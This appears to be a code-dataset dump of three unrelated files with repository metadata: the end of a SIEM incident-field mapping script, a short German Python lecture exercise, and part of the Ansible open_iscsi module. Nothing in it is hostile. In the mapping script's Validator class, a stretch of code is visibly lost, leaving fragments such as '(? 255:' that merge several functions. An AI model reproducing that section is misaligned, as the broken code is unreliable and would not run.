{'aliases': ['emailto',\n 'email to',\n 'to recipients',\n 'recipients',\n 'recipient'],\n 'validators': ['validate_email']},\n\n 'File Hash': {'aliases': ['filehash', 'file hash', 'event file hash', 'md5', 'sha1', 'sha256'],\n 'validators': ['validate_hash']},\n 'File Name': {'aliases': ['filename', 'file name'], 'validators': []},\n 'File Path': {'aliases': ['filepath', 'file path', 'full path', 'full path'],\n 'validators': ['validate_file_full_path']},\n 'File Size': {'aliases': ['filesize', 'file size'], 'validators': ['validate_number']},\n\n 'File Type': {'aliases': ['filetype', 'file type'],\n 'validators': ['validate_alphanumeric_with_common_punct']},\n\n 'Source Hostname': {\n 'aliases': ['source hostname', 'source host name', 'src hostname', 'src host name'],\n 'validators': ['validate_hostname']},\n\n 'Destination Hostname': {\n 'aliases': ['destination hostname', 'destination host name',\n 'dest hostname', 'dest host name', 'dst hostname', 'dst host name',\n 'target hostname', 'target host name'],\n 'validators': ['validate_hostname']},\n\n 'Source Network': {'aliases': ['source network', 'sourcenetwork', 'src network'],\n 'validators': ['validate_alphanumeric_with_common_punct']},\n 'Destination Network': {'aliases': ['destination network', 'destinationnetwork',\n 'dest network', 'dst network', 'target netwrok'],\n 'validators': ['validate_alphanumeric_with_common_punct']},\n\n 'Device Name': {\n 'aliases': ['devicename', 'device name', 'endpoint name', 'end point name'],\n 'validators': ['validate_alphanumeric_with_common_punct']},\n\n 'MAC Address': {'aliases': ['macaddress', 'mac address', 'mac', 'src mac', 'source mac'],\n 'validators': ['validate_mac']},\n\n 'PID': {'aliases': ['pid', 'process pid', 'parent process pid', 'target process pid'],\n 'validators': ['validate_number']},\n 'Parent Process ID': {'aliases': ['parentprocessid', 'parent process id'],\n 'validators': ['validate_number']},\n\n 'Region': {'aliases': ['region', 'region'], 'validators': ['validate_alphanumeric_with_common_punct']},\n\n 'Signature': {'aliases': ['signature', 'signature'], 'validators': []},\n\n 'Source IP': {\n 'aliases': ['sourceip', 'source ip', 'src ip', 'src address', 'source address', 'computer ip',\n 'device ip',\n 'attacker address', 'attacker ip', 'sender ip', 'sender address', 'agent ip'],\n 'validators': ['validate_ip']},\n\n 'Source Port': {'aliases': ['sourceport',\n 'source port',\n 'src port'],\n 'validators': ['validate_number']},\n\n 'OS': {'aliases': ['operating system', 'os type', 'os version', 'os'],\n 'validators': []},\n\n 'Subtype': {'aliases': ['subtype', 'subtype'],\n 'validators': ['validate_alphanumeric_with_common_punct']},\n\n 'Terminated Action': {'aliases': ['terminatedaction', 'terminated action'],\n 'validators': []},\n\n 'Traps ID': {'aliases': ['trapsid', 'traps id', 'trap id'], 'validators': []},\n\n 'Source Username': {'aliases': ['username', 'username', 'user name', 'src user name',\n 'src username', 'source username', 'source user name'],\n 'validators': ['validate_alphanumeric_with_common_punct']},\n 'Destination Username': {'aliases': ['destination username', 'destination user name',\n 'dest username', 'dest user name', 'dst username', 'dst user name',\n 'target user name', 'target username'],\n 'validators': ['validate_alphanumeric_with_common_punct']},\n\n 'Detection URL': {'aliases': ['detection url'],\n 'validators': ['validate_url']},\n\n 'Vendor ID': {'aliases': ['vendorid', 'vendor id'], 'validators': []},\n 'Vendor Product': {'aliases': ['vendorproduct', 'vendor product'],\n 'validators': ['validate_alphanumeric_with_common_punct']},\n 'category': {'aliases': ['category', 'category'],\n 'validators': ['validate_alphanumeric_with_common_punct']},\n 'details': {'aliases': ['details', 'description'],\n 'validators': ['validate_alphanumeric_with_common_punct']},\n 'name': {'aliases': ['name', 'Name', 'alert name', 'event name', 'rule name', 'title'],\n 'validators': ['validate_alphanumeric_with_common_punct', 'extact_name_math']},\n 'occurred': {'aliases': ['occurred', 'occured', 'occurred time', 'event start time', 'event at',\n 'event time', 'start time',\n 'create time', 'timestamp', 'unix time', 'click time'],\n 'validators': ['validate_date']},\n\n 'owner': {'aliases': ['owner'], 'validators': []},\n\n 'severity': {'aliases': ['event severity', 'severity', 'event priority', 'priority', 'urgency'],\n 'validators': []},\n\n 'Log Source': {'aliases': ['log source', 'log sources', 'logsource'], 'validators': []},\n\n 'Protocol': {'aliases': ['protocol'], 'validators': []},\n\n }\n\nsuffix_mapping = {\n 'ing': '',\n 'ly': '',\n 'ed': '',\n 'ious': '',\n 'ies': 'y',\n 'ive': '',\n 'es': '',\n 's': ''\n}\n\n\nclass DateValidator:\n\n def __init__(self):\n year_options = ['%y', '%Y']\n months_options = ['%m', '%B']\n day_options = ['%d']\n delimeters_options = [\".\", \"-\", \"/\", \"\\\\\"]\n self.common_separators = [' ', 'T', ',']\n\n date_formats_options = [] # type: List[tuple]\n for delimeter in delimeters_options:\n delimeters = [delimeter]\n date_formats_options += list(\n itertools.product(year_options, delimeters, months_options, delimeters, day_options))\n date_formats_options += list(\n itertools.product(year_options, delimeters, day_options, delimeters, months_options))\n date_formats_options += list(\n itertools.product(day_options, delimeters, months_options, delimeters, year_options))\n date_formats_options += list(\n itertools.product(day_options, delimeters, months_options, delimeters, year_options))\n\n self.date_formats_options = map(lambda x: \"\".join(x), date_formats_options)\n\n def try_parsing_date(self, text):\n for fmt in self.date_formats_options:\n try:\n return datetime.strptime(text, fmt)\n except ValueError:\n pass\n return None\n\n def has_valid_date(self, text):\n parts = [] # type: List[str]\n for sep in self.common_separators:\n parts += text.split(sep)\n return any(map(lambda x: self.try_parsing_date(x) is not None, parts))\n\n @staticmethod\n def is_datetime_last_years(d, number_of_years=3):\n if d is not None:\n now = datetime.now()\n return now - timedelta(days=365 * number_of_years) <= d <= now + timedelta(days=365 * number_of_years)\n return False\n\n @staticmethod\n def safe_parse_timestamp(value):\n try:\n d = datetime.fromtimestamp(int(value))\n return d\n except Exception:\n return None\n\n def is_unix_timestamp(self, value):\n try:\n value = int(value)\n return self.is_datetime_last_years(self.safe_parse_timestamp(value)) or self.is_datetime_last_years(\n self.safe_parse_timestamp(value / 1000))\n except Exception:\n return False\n\n\nclass Validator:\n\n def __init__(self):\n self.EMAIL_REGEX = re.compile('^\\w+([\\.-]?\\w+)*@\\w+([\\.-]?\\w+)*(\\.\\w{2,3})+$')\n self.NUMBER_REGEX = re.compile('^([0-9]+)$')\n self.SHA256_REGEX = re.compile('^[A-Fa-f0-9]{64}$')\n self.MD5_REGEX = re.compile('^[a-fA-F0-9]{32}$')\n self.HASH_REGEX = re.compile('^[a-fA-F0-9]+$')\n self.MAC_REGEX = re.compile('^[0-9a-f]{2}([-:]?)[0-9a-f]{2}(\\\\1[0-9a-f]{2}){4}$', re.IGNORECASE)\n self.URL_REGEX = re.compile(\n r'^(?:http|ftp|hxxp)s?://' # http:// or https://\n r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\\.)+(?:[A-Z]{2,6}\\.?|[A-Z0-9-]{2,}\\.?)|' # domain...\n r'localhost|' # localhost...\n r'\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})' # ...or ip\n r'(?::\\d+)?' # optional port\n r'(?:/?|[/?]\\S+)$', re.IGNORECASE)\n self.COMMON_NAME_CHARECTERS = re.compile('^[0-9a-zA-Z\"\\s_\\-\\'./]+$')\n self.HOSTNAME_PART_REGEX = re.compile('(?!-)[A-Z\\d-]{1,63}(? 255: # type: ignore\n return False\n if hostname[-1] == \".\": # type: ignore\n hostname = hostname[:-1] # type: ignore\n allowed = re.compile(\"(?!-)[A-Z\\d-]{1,63}(? len(lst):\n sub_set = False\n else:\n for i in range(len(lst)):\n if lst[i] == s[0]:\n n = 1\n while (n < len(s)) and (i + n) < len(lst) and (lst[i + n] == s[n]):\n n += 1\n\n if n == len(s):\n sub_set = True\n\n return sub_set\n\n\ndef lemma_word(word):\n for suffix in suffix_mapping:\n if word.endswith(suffix):\n candidate = word[:-len(suffix)] + suffix_mapping[suffix]\n if candidate in ALL_POSSIBLE_TERMS_SET or candidate.lower() in ALL_POSSIBLE_TERMS_SET:\n return candidate.lower()\n return word.lower()\n\n\ndef remove_dups(seq):\n return list(OrderedDict.fromkeys(seq))\n\n\ndef split_by_non_alpha_numeric(_string):\n return filter(lambda x: x, re.split('[^a-zA-Z0-9]', _string))\n\n\ndef camel_case_split(identifier):\n matches = re.finditer('.+?(?:(?<=[a-z])(?=[A-Z])|(?<=[A-Z])(?=[A-Z][a-z])|$)', identifier)\n return [m.group(0) for m in matches]\n\n\ndef flatten_json(y):\n out = {}\n has_more_than_one_value = []\n delimeter = '.'\n\n def flatten(x, name=''):\n if type(x) is dict:\n for a in x:\n flatten(x[a], name + a + delimeter)\n elif type(x) is list and len(x) > 0 and type(x) is not dict:\n i = 0\n for a in x:\n flatten(a, name + \"[\" + str(i) + \"]\" + delimeter)\n i += 1\n if i > 1:\n has_more_than_one_value.append(name[:-1])\n else:\n out[name[:-1]] = x\n\n flatten(y)\n return out, has_more_than_one_value\n\n\ndef number_of_terms(value):\n return len(value.split(\" \"))\n\n\ndef normilize(value):\n parts = [] # type: List[str]\n for part in split_by_non_alpha_numeric(value):\n parts += camel_case_split(part)\n terms = map(lemma_word, parts)\n return remove_dups(terms)\n\n\ndef validate_value_with_validator(alias, value, json_field_name=None):\n field_name = ALIASING_MAP[alias]\n validators = SIEM_FIELDS[field_name]['validators'] # type: ignore\n validators = [v for v in validators if v]\n if len(validators) == 0:\n return True\n validator_results = []\n for validator_name in validators:\n validator_results.append(VALIDATOR.validate(validator_name, alias, value, json_field_name))\n return all(validator_results)\n\n\ndef get_candidates(json_field_name):\n json_field_terms = normilize(json_field_name)\n aliases_terms = ALIASING_TERMS_MAP.items()\n match_terms = map(lambda x: x[0],\n filter(lambda alias_terms: is_sublist_of_list(alias_terms[1], json_field_terms), aliases_terms))\n return sorted(match_terms, reverse=True, key=number_of_terms)\n\n\ndef suggest_field_with_alias(json_field_name, json_field_value=None):\n norm_json_field_name = \" \".join(normilize(json_field_name))\n candidates = get_candidates(json_field_name)\n if json_field_value is not None:\n candidates = filter(lambda c: validate_value_with_validator(c, json_field_value, norm_json_field_name),\n candidates)\n if len(candidates) > 0:\n alias = candidates[0]\n return ALIASING_MAP[alias], alias\n return None, None\n\n\ndef suggest_field(json_field_name, json_field_value=None):\n return suggest_field_with_alias(json_field_name, json_field_value)[0]\n\n\ndef generate_aliases(field):\n aliases = []\n aliases.append(field.lower())\n aliases.append(\" \".join(normilize(field)))\n aliases.append(\"\".join(normilize(field)))\n return aliases\n\n\ndef get_aliasing(siem_fields):\n aliasing_map = {}\n aliases_terms_map = {}\n for field, data in siem_fields.items():\n for alias in data['aliases']:\n aliasing_map[alias] = field\n aliases_terms_map[alias] = alias.split(\" \")\n return aliasing_map, aliases_terms_map\n\n\ndef is_value_substring_of_one_values(value, all_values):\n return any(map(lambda field: value in field, all_values))\n\n\ndef get_alias_index(field_name, alias):\n return SIEM_FIELDS[field_name]['aliases'].index(alias) # type: ignore\n\n\ndef get_most_relevant_json_field(field_name, json_field_to_alias):\n if len(json_field_to_alias) == 0:\n return\n\n # calculate jaccard score for each alias, and get the candidates with max score\n scores = {}\n for json_field, alias in json_field_to_alias.items():\n scores[json_field] = jaccard_similarity_for_string_terms(json_field, alias)\n scores = {k: v for k, v in scores.items() if v == max(scores.values())}\n\n # calculate jaccard score for each field, and get the candidates with max score\n for json_field, alias in json_field_to_alias.items():\n scores[json_field] = jaccard_similarity_for_string_terms(json_field, field_name)\n scores = {k: v for k, v in scores.items() if v == max(scores.values())}\n\n # for candidates with the same score with the least alias index\n candidates = sorted(list(scores.keys()),\n key=lambda json_field: get_alias_index(field_name, json_field_to_alias[json_field]))\n\n return candidates[0]\n\n\ndef match_for_incident(incident_to_match):\n flat_incident, more_than_one_field_items = flatten_json(incident_to_match)\n incident = {k: v for k, v in flat_incident.items()\n if not is_value_substring_of_one_values(k, more_than_one_field_items)}\n if SCHEME_ONLY:\n incident = {k: v for k, v in incident.items() if not k.endswith(COUNT_KEYWORD)}\n else:\n incident = {k: v for k, v in incident.items() if v is not None and VALIDATOR.validate_not_count(k, v)}\n\n mapping = {} # type: ignore\n for json_field_name, json_field_value in incident.items():\n # we try to get suggestion if it's scheme or if the value is not empty\n if SCHEME_ONLY or json_field_value:\n incident_field_suggestion, alias = suggest_field_with_alias(json_field_name, json_field_value)\n if incident_field_suggestion:\n if incident_field_suggestion not in mapping:\n mapping[incident_field_suggestion] = {}\n mapping[incident_field_suggestion][json_field_name] = alias\n return {incident_field_name: get_most_relevant_json_field(incident_field_name, json_field_to_alias) for\n incident_field_name, json_field_to_alias in mapping.items()}\n\n\ndef jaccard_similarity(list1, list2):\n intersection = len(list(set(list1).intersection(list2)))\n union = (len(list1) + len(list2)) - intersection\n return float(intersection) / union\n\n\ndef jaccard_similarity_for_string_terms(str1, str2):\n return jaccard_similarity(normilize(str1), normilize(str2))\n\n\ndef get_most_relevant_match_for_field(field_name, cnt):\n # return exact match\n if field_name in cnt:\n return field_name\n\n suggestions_with_jaccard_score = [(suggestion, jaccard_similarity_for_string_terms(field_name, suggestion)) for\n suggestion in cnt.keys()]\n suggestions_with_jaccard_score = sorted(suggestions_with_jaccard_score, key=lambda x: x[1], reverse=True)\n\n # check for extact terms\n if suggestions_with_jaccard_score[0][1] == 1:\n return suggestions_with_jaccard_score[0][0]\n\n # if we have only scheme or all the values are the same\n if SCHEME_ONLY or len(set(cnt.values())) == 1:\n return suggestions_with_jaccard_score[0][0]\n\n return cnt.most_common()[0][0]\n\n\ndef match_for_incidents(incidents_to_match):\n fields_cnt = {} # type: Dict[str, Counter]\n for flat_incident in incidents_to_match:\n for k, v in match_for_incident(flat_incident).items():\n if k not in fields_cnt:\n fields_cnt[k] = Counter()\n if v:\n fields_cnt[k][v] += 1\n mapping_result = {field_name: get_most_relevant_match_for_field(field_name, field_cnt) for field_name, field_cnt in\n fields_cnt.items()}\n return mapping_result\n\n\ndef format_value_to_mapper(json_field):\n parts = json_field.split('.', 1)\n root = parts[0]\n accessor = \"\"\n if len(parts) > 1:\n accessor = parts[1]\n res = {\n \"simple\": \"\",\n \"complex\": {\n \"root\": root,\n \"accessor\": accessor,\n \"filters\": [],\n \"transformers\": []\n }\n }\n return res\n\n\ndef format_incident_field_to_mapper(incident_field_name, field_name_to_machine_name):\n res = {\n \"simple\": \"\",\n \"complex\": {\n \"root\": field_name_to_machine_name[incident_field_name],\n \"accessor\": \"\",\n \"filters\": [],\n \"transformers\": []\n }\n }\n return res\n\n\ndef verify_non_empty_values_in_incidents(expression, incidents):\n for incident in incidents:\n res = demisto.dt(incident, expression)\n if res:\n return True\n return False\n\n\ndef get_complex_value_key(complex_value):\n if 'complex' in complex_value:\n complex_value = complex_value['complex']\n readable_value = complex_value.get('root')\n if complex_value.get('accessor'):\n readable_value += \".\" + complex_value.get('accessor')\n return readable_value\n\n\ndef combine_mappers(original_mapper, new_mapper, incidents):\n mapper = new_mapper\n if original_mapper:\n mapper.update(original_mapper)\n return mapper\n\n\ndef filter_by_dict_by_keys(_dict, keys):\n return {k: v for k, v in _dict.items() if k in keys}\n\n\ndef parse_incident_sample(sample):\n if type(sample) is dict and 'rawJSON' in sample:\n incident = json.loads(sample['rawJSON'])\n else:\n try:\n incident = json.loads(sample)\n except Exception:\n incident = sample\n return incident\n\n\nSCHEME_ONLY = False\nVALIDATOR = Validator()\nALIASING_MAP, ALIASING_TERMS_MAP, FIELD_NAME_TO_CLI_NAME = {}, {}, {}\nALL_POSSIBLE_TERMS_SET = set()\n\n\ndef init():\n global SCHEME_ONLY, VALIDATOR, \\\n ALIASING_MAP, ALIASING_TERMS_MAP, \\\n ALL_POSSIBLE_TERMS_SET, SIEM_FIELDS, FIELD_NAME_TO_CLI_NAME\n\n SCHEME_ONLY = demisto.args().get('incidentSamplesType') in [SAMPLES_OUTGOING, SAMPLES_SCHEME]\n\n fields = demisto.args().get('incidentFields', {})\n if fields and len(fields) > 0:\n fields_names = map(lambda x: x['name'], fields)\n SIEM_FIELDS = filter_by_dict_by_keys(SIEM_FIELDS, fields_names)\n for custom_field in filter(lambda x: not x['system'], fields):\n field_name = custom_field[INCIDENT_FIELD_NAME]\n SIEM_FIELDS[field_name] = {'aliases': generate_aliases(field_name), 'validators': []}\n\n FIELD_NAME_TO_CLI_NAME = {field[INCIDENT_FIELD_NAME]: field[INCIDENT_FIELD_MACHINE_NAME] for field in fields}\n\n ALIASING_MAP, ALIASING_TERMS_MAP = get_aliasing(SIEM_FIELDS)\n\n terms = [] # type: List[str]\n for field in SIEM_FIELDS.values():\n for alias in field['aliases']: # type: ignore\n terms += alias.split(\" \")\n ALL_POSSIBLE_TERMS_SET = set(terms)\n\n\ndef main():\n init()\n incidents_samples = demisto.args().get('incidentSamples')\n if incidents_samples:\n if isinstance(incidents_samples, basestring):\n incidents_samples = json.loads(incidents_samples) # type: ignore\n incidents = map(parse_incident_sample, incidents_samples)\n else:\n return_error(\"Could not parse incident samples\")\n\n original_mapper = demisto.args().get('currentMapper')\n if type(original_mapper) is not dict or len(original_mapper) == 0:\n original_mapper = None\n\n matches = match_for_incidents(incidents)\n if demisto.args().get('incidentSamplesType') == SAMPLES_OUTGOING:\n mapper = {v: format_incident_field_to_mapper(k, FIELD_NAME_TO_CLI_NAME) for k, v in matches.items() if\n k in FIELD_NAME_TO_CLI_NAME}\n else:\n mapper = {k: format_value_to_mapper(v) for k, v in matches.items()}\n mapper = combine_mappers(original_mapper, mapper, incidents)\n\n return mapper\n\n\nif __name__ in ['__main__', '__builtin__', 'builtins']:\n demisto.results(main())\n"},"avg_line_length":{"kind":"number","value":41.982712766,"string":"41.982713"},"max_line_length":{"kind":"number","value":119,"string":"119"},"alphanum_fraction":{"kind":"number","value":0.565423965,"string":"0.565424"}}},{"rowIdx":46364,"cells":{"hexsha":{"kind":"string","value":"beb9462e7eb4cb9120161d5efcebb2195448e61e"},"size":{"kind":"number","value":388,"string":"388"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"vorl1.py"},"max_stars_repo_name":{"kind":"string","value":"haenno/FOM-BSc-WI-Semster3-Skriptsprachen-Python"},"max_stars_repo_head_hexsha":{"kind":"string","value":"bb34b6b1ba7e8fe7b22ce598a80d5011122c2d4a"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"null"},"max_stars_repo_stars_event_min_datetime":{"kind":"null"},"max_stars_repo_stars_event_max_datetime":{"kind":"null"},"max_issues_repo_path":{"kind":"string","value":"vorl1.py"},"max_issues_repo_name":{"kind":"string","value":"haenno/FOM-BSc-WI-Semster3-Skriptsprachen-Python"},"max_issues_repo_head_hexsha":{"kind":"string","value":"bb34b6b1ba7e8fe7b22ce598a80d5011122c2d4a"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"vorl1.py"},"max_forks_repo_name":{"kind":"string","value":"haenno/FOM-BSc-WI-Semster3-Skriptsprachen-Python"},"max_forks_repo_head_hexsha":{"kind":"string","value":"bb34b6b1ba7e8fe7b22ce598a80d5011122c2d4a"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"# 1. Vorlesung mit Python (3. zu Skriptsprachen insges. -- 26.09.2020 - 1. PDF dazu)\n\nx = input (\"Ihr Name? \")\nX = \"Hallo \" + x\nprint (x)\n\nx = input (\"Ihr Alter? \")\nx = int(x) - 5 \nprint (x)\n\n# Seite 12\n\nliste = \"Hello World\"\nprint (liste)\nprint (liste[2])\n\n# Seite 17\n\nstrvar = \"ABC\"\nprint (strvar)\n\nstrvar = \"ABC\" * 5\nprint (strvar)\n\n#strvar = \"ABC\" + 5 #datentypfehler\nprint (strvar)\n\n"},"avg_line_length":{"kind":"number","value":13.8571428571,"string":"13.857143"},"max_line_length":{"kind":"number","value":84,"string":"84"},"alphanum_fraction":{"kind":"number","value":0.6082474227,"string":"0.608247"}}},{"rowIdx":46365,"cells":{"hexsha":{"kind":"string","value":"22a835b39d5c26d87758f88e10e54d6007c99983"},"size":{"kind":"number","value":11393,"string":"11,393"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/system/open_iscsi.py"},"max_stars_repo_name":{"kind":"string","value":"tr3ck3r/linklight"},"max_stars_repo_head_hexsha":{"kind":"string","value":"5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"null"},"max_stars_repo_stars_event_min_datetime":{"kind":"null"},"max_stars_repo_stars_event_max_datetime":{"kind":"null"},"max_issues_repo_path":{"kind":"string","value":"exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/system/open_iscsi.py"},"max_issues_repo_name":{"kind":"string","value":"tr3ck3r/linklight"},"max_issues_repo_head_hexsha":{"kind":"string","value":"5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/system/open_iscsi.py"},"max_forks_repo_name":{"kind":"string","value":"tr3ck3r/linklight"},"max_forks_repo_head_hexsha":{"kind":"string","value":"5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# Copyright: (c) 2013, Serge van Ginderachter \n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\n\nfrom __future__ import absolute_import, division, print_function\n__metaclass__ = type\n\nANSIBLE_METADATA = {'metadata_version': '1.1',\n 'status': ['preview'],\n 'supported_by': 'community'}\n\nDOCUMENTATION = r'''\n---\nmodule: open_iscsi\nauthor:\n- Serge van Ginderachter (@srvg)\nshort_description: Manage iSCSI targets with Open-iSCSI\ndescription:\n - Discover targets on given portal, (dis)connect targets, mark targets to\n manually or auto start, return device nodes of connected targets.\nrequirements:\n - open_iscsi library and tools (iscsiadm)\noptions:\n portal:\n description:\n - The IP address of the iSCSI target.\n type: str\n aliases: [ ip ]\n port:\n description:\n - The port on which the iSCSI target process listens.\n type: str\n default: 3260\n target:\n description:\n - The iSCSI target name.\n type: str\n aliases: [ name, targetname ]\n login:\n description:\n - Whether the target node should be connected.\n type: bool\n aliases: [ state ]\n node_auth:\n description:\n - The value for C(discovery.sendtargets.auth.authmethod).\n type: str\n default: CHAP\n node_user:\n description:\n - The value for C(discovery.sendtargets.auth.username).\n type: str\n node_pass:\n description:\n - The value for C(discovery.sendtargets.auth.password).\n type: str\n auto_node_startup:\n description:\n - Whether the target node should be automatically connected at startup.\n type: bool\n aliases: [ automatic ]\n discover:\n description:\n - Whether the list of target nodes on the portal should be\n (re)discovered and added to the persistent iSCSI database.\n - Keep in mind that C(iscsiadm) discovery resets configuration, like C(node.startup)\n to manual, hence combined with C(auto_node_startup=yes) will always return\n a changed state.\n type: bool\n show_nodes:\n description:\n - Whether the list of nodes in the persistent iSCSI database should be returned by the module.\n type: bool\n'''\n\nEXAMPLES = r'''\n- name: Perform a discovery on 10.1.2.3 and show available target nodes\n open_iscsi:\n show_nodes: yes\n discover: yes\n portal: 10.1.2.3\n\n# NOTE: Only works if exactly one target is exported to the initiator\n- name: Discover targets on portal and login to the one available\n open_iscsi:\n portal: '{{ iscsi_target }}'\n login: yes\n discover: yes\n\n- name: Connect to the named target, after updating the local persistent database (cache)\n open_iscsi:\n login: yes\n target: iqn.1986-03.com.sun:02:f8c1f9e0-c3ec-ec84-c9c9-8bfb0cd5de3d\n\n- name: Disconnect from the cached named target\n open_iscsi:\n login: no\n target: iqn.1986-03.com.sun:02:f8c1f9e0-c3ec-ec84-c9c9-8bfb0cd5de3d\n'''\n\nimport glob\nimport os\nimport time\n\nfrom ansible.module_utils.basic import AnsibleModule\n\nISCSIADM = 'iscsiadm'\n\n\ndef compare_nodelists(l1, l2):\n l1.sort()\n l2.sort()\n return l1 == l2\n\n\ndef iscsi_get_cached_nodes(module, portal=None):\n cmd = '%s --mode node' % iscsiadm_cmd\n (rc, out, err) = module.run_command(cmd)\n\n if rc == 0:\n lines = out.splitlines()\n nodes = []\n for line in lines:\n # line format is \"ip:port,target_portal_group_tag targetname\"\n parts = line.split()\n if len(parts) > 2:\n module.fail_json(msg='error parsing output', cmd=cmd)\n target = parts[1]\n parts = parts[0].split(':')\n target_portal = parts[0]\n\n if portal is None or portal == target_portal:\n nodes.append(target)\n\n # older versions of scsiadm don't have nice return codes\n # for newer versions see iscsiadm(8); also usr/iscsiadm.c for details\n # err can contain [N|n]o records...\n elif rc == 21 or (rc == 255 and \"o records found\" in err):\n nodes = []\n else:\n module.fail_json(cmd=cmd, rc=rc, msg=err)\n\n return nodes\n\n\ndef iscsi_discover(module, portal, port):\n cmd = '%s --mode discovery --type sendtargets --portal %s:%s' % (iscsiadm_cmd, portal, port)\n (rc, out, err) = module.run_command(cmd)\n\n if rc > 0:\n module.fail_json(cmd=cmd, rc=rc, msg=err)\n\n\ndef target_loggedon(module, target):\n cmd = '%s --mode session' % iscsiadm_cmd\n (rc, out, err) = module.run_command(cmd)\n\n if rc == 0:\n return target in out\n elif rc == 21:\n return False\n else:\n module.fail_json(cmd=cmd, rc=rc, msg=err)\n\n\ndef target_login(module, target, portal=None, port=None):\n node_auth = module.params['node_auth']\n node_user = module.params['node_user']\n node_pass = module.params['node_pass']\n\n if node_user:\n params = [('node.session.auth.authmethod', node_auth),\n ('node.session.auth.username', node_user),\n ('node.session.auth.password', node_pass)]\n for (name, value) in params:\n cmd = '%s --mode node --targetname %s --op=update --name %s --value %s' % (iscsiadm_cmd, target, name, value)\n (rc, out, err) = module.run_command(cmd)\n if rc > 0:\n module.fail_json(cmd=cmd, rc=rc, msg=err)\n\n cmd = '%s --mode node --targetname %s --login' % (iscsiadm_cmd, target)\n if portal is not None and port is not None:\n cmd += ' --portal %s:%s' % (portal, port)\n\n (rc, out, err) = module.run_command(cmd)\n\n if rc > 0:\n module.fail_json(cmd=cmd, rc=rc, msg=err)\n\n\ndef target_logout(module, target):\n cmd = '%s --mode node --targetname %s --logout' % (iscsiadm_cmd, target)\n (rc, out, err) = module.run_command(cmd)\n\n if rc > 0:\n module.fail_json(cmd=cmd, rc=rc, msg=err)\n\n\ndef target_device_node(module, target):\n # if anyone know a better way to find out which devicenodes get created for\n # a given target...\n\n devices = glob.glob('/dev/disk/by-path/*%s*' % target)\n devdisks = []\n for dev in devices:\n # exclude partitions\n if \"-part\" not in dev:\n devdisk = os.path.realpath(dev)\n # only add once (multi-path?)\n if devdisk not in devdisks:\n devdisks.append(devdisk)\n return devdisks\n\n\ndef target_isauto(module, target):\n cmd = '%s --mode node --targetname %s' % (iscsiadm_cmd, target)\n (rc, out, err) = module.run_command(cmd)\n\n if rc == 0:\n lines = out.splitlines()\n for line in lines:\n if 'node.startup' in line:\n return 'automatic' in line\n return False\n else:\n module.fail_json(cmd=cmd, rc=rc, msg=err)\n\n\ndef target_setauto(module, target):\n cmd = '%s --mode node --targetname %s --op=update --name node.startup --value automatic' % (iscsiadm_cmd, target)\n (rc, out, err) = module.run_command(cmd)\n\n if rc > 0:\n module.fail_json(cmd=cmd, rc=rc, msg=err)\n\n\ndef target_setmanual(module, target):\n cmd = '%s --mode node --targetname %s --op=update --name node.startup --value manual' % (iscsiadm_cmd, target)\n (rc, out, err) = module.run_command(cmd)\n\n if rc > 0:\n module.fail_json(cmd=cmd, rc=rc, msg=err)\n\n\ndef main():\n # load ansible module object\n module = AnsibleModule(\n argument_spec=dict(\n\n # target\n portal=dict(type='str', aliases=['ip']),\n port=dict(type='str', default='3260'),\n target=dict(type='str', aliases=['name', 'targetname']),\n node_auth=dict(type='str', default='CHAP'),\n node_user=dict(type='str'),\n node_pass=dict(type='str', no_log=True),\n\n # actions\n login=dict(type='bool', aliases=['state']),\n auto_node_startup=dict(type='bool', aliases=['automatic']),\n discover=dict(type='bool', default=False),\n show_nodes=dict(type='bool', default=False),\n ),\n\n required_together=[['discover_user', 'discover_pass'],\n ['node_user', 'node_pass']],\n supports_check_mode=True,\n )\n\n global iscsiadm_cmd\n iscsiadm_cmd = module.get_bin_path('iscsiadm', required=True)\n\n # parameters\n portal = module.params['portal']\n target = module.params['target']\n port = module.params['port']\n login = module.params['login']\n automatic = module.params['auto_node_startup']\n discover = module.params['discover']\n show_nodes = module.params['show_nodes']\n\n check = module.check_mode\n\n cached = iscsi_get_cached_nodes(module, portal)\n\n # return json dict\n result = {}\n result['changed'] = False\n\n if discover:\n if portal is None:\n module.fail_json(msg=\"Need to specify at least the portal (ip) to discover\")\n elif check:\n nodes = cached\n else:\n iscsi_discover(module, portal, port)\n nodes = iscsi_get_cached_nodes(module, portal)\n if not compare_nodelists(cached, nodes):\n result['changed'] |= True\n 